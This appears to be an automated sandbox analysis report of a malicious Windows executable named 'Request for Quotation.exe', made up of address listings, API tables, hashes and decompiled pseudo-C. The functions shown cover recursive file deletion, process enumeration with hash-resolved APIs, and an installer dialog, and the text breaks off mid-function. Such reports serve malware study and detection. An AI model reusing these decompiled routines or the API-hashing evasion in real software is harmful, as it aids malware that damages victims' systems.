                                                                                0x6f711f6d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711dfc
                                                                                0x6f711e02
                                                                                0x6f711e05
                                                                                0x6f711e07
                                                                                0x6f711e07
                                                                                0x6f711e0a
                                                                                0x6f711e0e
                                                                                0x6f711e1b
                                                                                0x6f711e1d
                                                                                0x6f711e23
                                                                                0x6f711e23
                                                                                0x6f711e23
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f20
                                                                                0x6f711f20
                                                                                0x6f711f22
                                                                                0x6f711f29
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f67
                                                                                0x6f711f67
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f32
                                                                                0x6f711f32
                                                                                0x6f711f34
                                                                                0x6f711f3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f44
                                                                                0x6f711f44
                                                                                0x6f711f46
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f75
                                                                                0x6f711f75
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f4f
                                                                                0x6f711f4f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f9b
                                                                                0x6f711f9f
                                                                                0x6f711fa4
                                                                                0x6f711fa7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f59
                                                                                0x6f711f59
                                                                                0x6f711f5c
                                                                                0x6f711f5e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711f6e
                                                                                0x6f711f6e
                                                                                0x6f711f77
                                                                                0x6f711f77
                                                                                0x6f711e5a
                                                                                0x6f711e5a
                                                                                0x6f711e5d
                                                                                0x6f711e64
                                                                                0x6f711e66
                                                                                0x6f711e68
                                                                                0x6f711e6f
                                                                                0x6f711e72
                                                                                0x6f711e77
                                                                                0x6f711e79
                                                                                0x6f711e7b
                                                                                0x6f711e7f
                                                                                0x6f711e85
                                                                                0x6f711e8b
                                                                                0x6f711e8b
                                                                                0x6f711e8d
                                                                                0x6f711e8d
                                                                                0x6f711e8e
                                                                                0x6f711e8e
                                                                                0x6f711e92
                                                                                0x6f711e98
                                                                                0x6f711e9a
                                                                                0x6f711e9e
                                                                                0x6f711ea3
                                                                                0x6f711ea3
                                                                                0x6f711ea5
                                                                                0x6f711ea5
                                                                                0x6f711ea8
                                                                                0x6f711eab
                                                                                0x6f711eb4
                                                                                0x6f711eb7
                                                                                0x6f711eba
                                                                                0x6f711eba
                                                                                0x6f711ebc
                                                                                0x6f711ebf
                                                                                0x6f711ec5
                                                                                0x6f711ecb
                                                                                0x6f711ecb
                                                                                0x6f711ecd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711ed3
                                                                                0x6f711ed3
                                                                                0x6f711ed7
                                                                                0x6f711ede
                                                                                0x6f711f02
                                                                                0x6f711f02
                                                                                0x6f711f06
                                                                                0x6f711f08
                                                                                0x6f711f0b
                                                                                0x6f711f0b
                                                                                0x6f711f0e
                                                                                0x6f711f0e
                                                                                0x00000000
                                                                                0x6f711f06
                                                                                0x6f711ee3
                                                                                0x6f711ee6
                                                                                0x6f711ee6
                                                                                0x6f711eed
                                                                                0x6f711eef
                                                                                0x6f711ef2
                                                                                0x6f711ef9
                                                                                0x6f711efa
                                                                                0x6f711f00
                                                                                0x6f711f00
                                                                                0x00000000
                                                                                0x6f711f00
                                                                                0x6f711ef4
                                                                                0x6f711ef7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711ef7
                                                                                0x6f711e87
                                                                                0x6f711e89
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711df5
                                                                                0x6f711c9b
                                                                                0x6f711c9b
                                                                                0x6f711c9c
                                                                                0x6f711ddb
                                                                                0x00000000
                                                                                0x6f711ddb
                                                                                0x6f711ca2
                                                                                0x6f711ca3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711ca9
                                                                                0x6f711cac
                                                                                0x6f711da0
                                                                                0x6f711da0
                                                                                0x6f711da3
                                                                                0x6f711db8
                                                                                0x6f711dba
                                                                                0x6f711dba
                                                                                0x6f711dbb
                                                                                0x6f711dbe
                                                                                0x6f711dc1
                                                                                0x6f711dcd
                                                                                0x6f711dcd
                                                                                0x6f711dcd
                                                                                0x6f711dc3
                                                                                0x6f711dc3
                                                                                0x6f711dc3
                                                                                0x6f711dd3
                                                                                0x00000000
                                                                                0x6f711dd3
                                                                                0x6f711da5
                                                                                0x6f711da5
                                                                                0x6f711da6
                                                                                0x6f711db4
                                                                                0x00000000
                                                                                0x6f711db4
                                                                                0x6f711da9
                                                                                0x6f711daa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711db0
                                                                                0x00000000
                                                                                0x6f711db0
                                                                                0x6f711cb2
                                                                                0x6f711d9c
                                                                                0x00000000
                                                                                0x6f711d9c
                                                                                0x6f711cb8
                                                                                0x6f711cb8
                                                                                0x6f711cbb
                                                                                0x6f711ce4
                                                                                0x00000000
                                                                                0x6f711ce4
                                                                                0x6f711cbd
                                                                                0x6f711cbd
                                                                                0x6f711cc0
                                                                                0x6f711cda
                                                                                0x00000000
                                                                                0x6f711cda
                                                                                0x6f711cc2
                                                                                0x6f711cc2
                                                                                0x6f711cc5
                                                                                0x6f711cd4
                                                                                0x00000000
                                                                                0x6f711cd4
                                                                                0x6f711cc8
                                                                                0x6f711cc9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711ccb
                                                                                0x00000000
                                                                                0x6f711b83
                                                                                0x6f711b83
                                                                                0x6f711b86
                                                                                0x00000000
                                                                                0x6f711b86
                                                                                0x6f711b7d
                                                                                0x6f711b6b
                                                                                0x6f711b6f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711b71
                                                                                0x6f711b74
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711b74
                                                                                0x6f711b05
                                                                                0x6f711b08
                                                                                0x6f711b3e
                                                                                0x6f711b41
                                                                                0x00000000
                                                                                0x6f711b47
                                                                                0x6f711b49
                                                                                0x6f711b4d
                                                                                0x6f711b54
                                                                                0x6f711b5b
                                                                                0x6f711b5e
                                                                                0x6f711b61
                                                                                0x00000000
                                                                                0x6f711b61
                                                                                0x6f711b41
                                                                                0x6f711b0a
                                                                                0x6f711b0b
                                                                                0x6f711b26
                                                                                0x6f711b29
                                                                                0x00000000
                                                                                0x6f711b2f
                                                                                0x6f711b2f
                                                                                0x6f711b36
                                                                                0x6f711b39
                                                                                0x00000000
                                                                                0x6f711b39
                                                                                0x6f711b29
                                                                                0x6f711b10
                                                                                0x00000000
                                                                                0x6f711b16
                                                                                0x6f711b16
                                                                                0x6f711b1d
                                                                                0x00000000
                                                                                0x6f711b1d
                                                                                0x6f711b10
                                                                                0x6f711d09
                                                                                0x6f711d0e
                                                                                0x6f711d13
                                                                                0x6f711d17
                                                                                0x6f7121c6
                                                                                0x6f7121cc
                                                                                0x6f711d29
                                                                                0x6f711d2b
                                                                                0x6f711d2c
                                                                                0x6f7120f1
                                                                                0x6f7120f1
                                                                                0x6f7120f4
                                                                                0x6f7120f7
                                                                                0x6f712114
                                                                                0x6f71211a
                                                                                0x6f71211c
                                                                                0x6f712122
                                                                                0x6f712139
                                                                                0x6f712139
                                                                                0x6f712139
                                                                                0x6f712146
                                                                                0x6f71214c
                                                                                0x6f71214f
                                                                                0x6f712155
                                                                                0x6f712157
                                                                                0x6f71215a
                                                                                0x6f71215c
                                                                                0x6f712163
                                                                                0x6f712168
                                                                                0x6f71216b
                                                                                0x6f71216d
                                                                                0x6f712172
                                                                                0x6f712184
                                                                                0x6f712184
                                                                                0x6f712172
                                                                                0x6f71216b
                                                                                0x6f71215a
                                                                                0x6f71218a
                                                                                0x6f71218d
                                                                                0x6f712197
                                                                                0x6f71219f
                                                                                0x6f7121ab
                                                                                0x6f7121b1
                                                                                0x6f7121b4
                                                                                0x6f7120e6
                                                                                0x6f7120e6
                                                                                0x00000000
                                                                                0x6f7120e6
                                                                                0x6f7121ba
                                                                                0x6f7121c0
                                                                                0x6f7121c0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7121c2
                                                                                0x6f7121c2
                                                                                0x6f7121c2
                                                                                0x6f7121c2
                                                                                0x00000000
                                                                                0x6f71218f
                                                                                0x6f71218f
                                                                                0x6f712195
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712195
                                                                                0x6f71218d
                                                                                0x6f712125
                                                                                0x6f71212b
                                                                                0x6f71212d
                                                                                0x6f712133
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712133
                                                                                0x6f7120f9
                                                                                0x6f712100
                                                                                0x6f712106
                                                                                0x6f71210c
                                                                                0x00000000
                                                                                0x6f71210c
                                                                                0x6f711d32
                                                                                0x6f711d33
                                                                                0x6f7120d0
                                                                                0x6f7120d0
                                                                                0x6f7120d6
                                                                                0x6f7120d9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7120e0
                                                                                0x6f7120e5
                                                                                0x00000000
                                                                                0x6f7120e5
                                                                                0x6f711d3a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711d40
                                                                                0x6f711d40
                                                                                0x6f711d49
                                                                                0x6f711d4e
                                                                                0x6f711d54
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f711d5a
                                                                                0x6f711d67
                                                                                0x6f711d6d
                                                                                0x6f711d77
                                                                                0x6f711d7d
                                                                                0x6f711d85
                                                                                0x6f711d95
                                                                                0x00000000
                                                                                0x6f711d95

                                                                                APIs
                                                                                  • Part of subcall function 6F711215: GlobalAlloc.KERNELBASE(00000040,6F711233,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F71121D
                                                                                • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6F711BC4
                                                                                • lstrcpyA.KERNEL32(00000008,?), ref: 6F711C0C
                                                                                • lstrcpyA.KERNEL32(00000408,?), ref: 6F711C16
                                                                                • GlobalFree.KERNEL32 ref: 6F711C29
                                                                                • GlobalFree.KERNEL32 ref: 6F711D09
                                                                                • GlobalFree.KERNEL32 ref: 6F711D0E
                                                                                • GlobalFree.KERNEL32 ref: 6F711D13
                                                                                • GlobalFree.KERNEL32 ref: 6F711EFA
                                                                                • lstrcpyA.KERNEL32(?,?), ref: 6F712098
                                                                                • GetModuleHandleA.KERNELBASE(00000008), ref: 6F712114
                                                                                • LoadLibraryA.KERNELBASE(00000008), ref: 6F712125
                                                                                • GetProcAddress.KERNEL32(?,?), ref: 6F71217E
                                                                                • lstrlenA.KERNEL32(00000408), ref: 6F712198
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                • String ID:
                                                                                • API String ID: 245916457-0
                                                                                • Opcode ID: 19f4d7bcd37752d6a1c81700f6ac1c1b6669308f5d579d9c61c6511cd7ad06e1
                                                                                • Instruction ID: fae0c6d846cb8c82005ac49b6b23832dcb05814cf4425d9326cf53bcdbfe7195
                                                                                • Opcode Fuzzy Hash: 19f4d7bcd37752d6a1c81700f6ac1c1b6669308f5d579d9c61c6511cd7ad06e1
                                                                                • Instruction Fuzzy Hash: 3D22AE7190C60A9FDB10CFB886847EEBBF8BF16315F18463ED1A5EA180D7B06549CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                0x00405a1f
                                                                                0x00405a24
                                                                                0x00405a2d
                                                                                0x00405a30
                                                                                0x00405a38
                                                                                0x00405a3b
                                                                                0x00405a3e
                                                                                0x00405a46
                                                                                0x00405a48
                                                                                0x00405a49
                                                                                0x00000000
                                                                                0x00405a49
                                                                                0x00405a54
                                                                                0x00405a57
                                                                                0x00405a57
                                                                                0x00405a57
                                                                                0x00405a5b
                                                                                0x00405a6e
                                                                                0x00405a75
                                                                                0x00405a7a
                                                                                0x00405a7e
                                                                                0x00405a8e
                                                                                0x00405a80
                                                                                0x00405a86
                                                                                0x00405a86
                                                                                0x00405a93
                                                                                0x00405a96
                                                                                0x00405aa1
                                                                                0x00405aa7
                                                                                0x00405aac
                                                                                0x00405abc
                                                                                0x00405abe
                                                                                0x00405ac4
                                                                                0x00405ac7
                                                                                0x00405aca
                                                                                0x00405b82
                                                                                0x00405b82
                                                                                0x00405b86
                                                                                0x00405b88
                                                                                0x00405b88
                                                                                0x00405b88
                                                                                0x00405b88
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ad0
                                                                                0x00405ad0
                                                                                0x00405ad9
                                                                                0x00405adf
                                                                                0x00405ae4
                                                                                0x00405ae7
                                                                                0x00405ae9
                                                                                0x00405aed
                                                                                0x00405aef
                                                                                0x00405aef
                                                                                0x00405aed
                                                                                0x00405af2
                                                                                0x00405af5
                                                                                0x00405b08
                                                                                0x00405b0a
                                                                                0x00405b0f
                                                                                0x00405b16
                                                                                0x00405b31
                                                                                0x00405b36
                                                                                0x00405b38
                                                                                0x00405b5c
                                                                                0x00405b3a
                                                                                0x00405b3a
                                                                                0x00405b3d
                                                                                0x00405b51
                                                                                0x00405b3f
                                                                                0x00405b42
                                                                                0x00405b4a
                                                                                0x00405b4a
                                                                                0x00405b3d
                                                                                0x00405b18
                                                                                0x00405b1e
                                                                                0x00405b20
                                                                                0x00405b26
                                                                                0x00405b26
                                                                                0x00405b20
                                                                                0x00000000
                                                                                0x00405b16
                                                                                0x00405af7
                                                                                0x00405afa
                                                                                0x00405afc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405afe
                                                                                0x00405b00
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405b02
                                                                                0x00405b06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405b61
                                                                                0x00405b6b
                                                                                0x00405b71
                                                                                0x00405b71
                                                                                0x00405b7c
                                                                                0x00000000
                                                                                0x00405b7c
                                                                                0x00405a98
                                                                                0x00405a9f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405a5d
                                                                                0x00405a5d
                                                                                0x00405a5f
                                                                                0x00405b8c
                                                                                0x00405b8e
                                                                                0x00405b91
                                                                                0x00405be2
                                                                                0x00405be2
                                                                                0x00405be2
                                                                                0x00405b93
                                                                                0x00405b96
                                                                                0x00405ba1
                                                                                0x00405ba6
                                                                                0x00405ba8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405bab
                                                                                0x00405bb7
                                                                                0x00405bbc
                                                                                0x00405bbe
                                                                                0x00000000
                                                                                0x00405bd9
                                                                                0x00405bc0
                                                                                0x00405bc3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405bc8
                                                                                0x00000000
                                                                                0x00405bcf
                                                                                0x00405b98
                                                                                0x00405b98
                                                                                0x00000000
                                                                                0x00405b98
                                                                                0x00405a65
                                                                                0x00405a68
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405a68

                                                                                APIs
                                                                                • DeleteFileA.KERNELBASE(?,?,73BCFA90,73BCF560,00000000), ref: 00405A3E
                                                                                • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405A86
                                                                                • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405AA7
                                                                                • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405AAD
                                                                                • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405ABE
                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                                • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                                Strings
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00405A15
                                                                                • \*.*, xrefs: 00405A80
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $\*.*
                                                                                • API String ID: 2035342205-1666489876
                                                                                • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                                • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6EEE4211, Relevance: 4.6, APIs: 3, Instructions: 52processCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E6EEE4211(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				void* _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E6EEE6B57();
				_v16 = E6EEE6BFF(_v8, 0xea31d3b6);
				_v20 = E6EEE6BFF(_v8, 0x5c7bf6e9);
				_v24 = E6EEE6BFF(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E6EEE41CD( &_v544) != _a4) {
							if(Process32NextW(_v12,  &_v580) != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}











                                                                                0x6eee421f
                                                                                0x6eee422f
                                                                                0x6eee423f
                                                                                0x6eee424f
                                                                                0x6eee4259
                                                                                0x6eee4260
                                                                                0x6eee4266
                                                                                0x6eee4270
                                                                                0x6eee427a
                                                                                0x6eee427f
                                                                                0x6eee4285
                                                                                0x6eee42aa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee42ac
                                                                                0x00000000
                                                                                0x6eee4298
                                                                                0x00000000
                                                                                0x6eee4281
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6EEE4256
                                                                                • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6EEE427A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 2353314856-0
                                                                                • Opcode ID: 41d588a3bc25e22c4c20c1f33dcee25c22b68df7f34c305ee71ff3d8f88bc203
                                                                                • Instruction ID: 55a63ce148364493ff03a6f882a1ae383789ef15fe7a88219cfdca45ea950e14
                                                                                • Opcode Fuzzy Hash: 41d588a3bc25e22c4c20c1f33dcee25c22b68df7f34c305ee71ff3d8f88bc203
                                                                                • Instruction Fuzzy Hash: E9111C70D6411AAEDB50DFF4CC49AADBBB8EF08308F2049B6E914A1A50E7308A429B11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004065C1(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c108;
			}




                                                                                0x004065cc
                                                                                0x004065d5
                                                                                0x00000000
                                                                                0x004065e2
                                                                                0x004065d8
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(73BCFA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,73BCFA90,?,73BCF560,00405A35,?,73BCFA90,73BCF560), ref: 004065CC
                                                                                • FindClose.KERNEL32(00000000), ref: 004065D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                • Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
                                                                                • Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
                                                                                • Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28); // executed
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
